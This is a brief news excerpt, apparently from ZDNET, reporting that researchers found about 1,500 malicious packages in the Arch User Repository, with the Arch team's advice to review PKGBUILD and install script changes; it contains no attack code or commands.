GoKawiilElyse Betters Picaro/ZDNET
Follow ZDNET: Add us as a preferred source on Google.
ZDNET's key takeaways
The Arch User Repository was found to contain malicious apps.
Twice in a week's span was this discovered.
Users are warned to be vigilant, but there are other, easier ways.
Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.
"We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information," The Arch team said in a brief statement.
This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.
Also: Archcraft is a solid, super fast distro for anyone ready to move beyond beginner Linux
... continue reading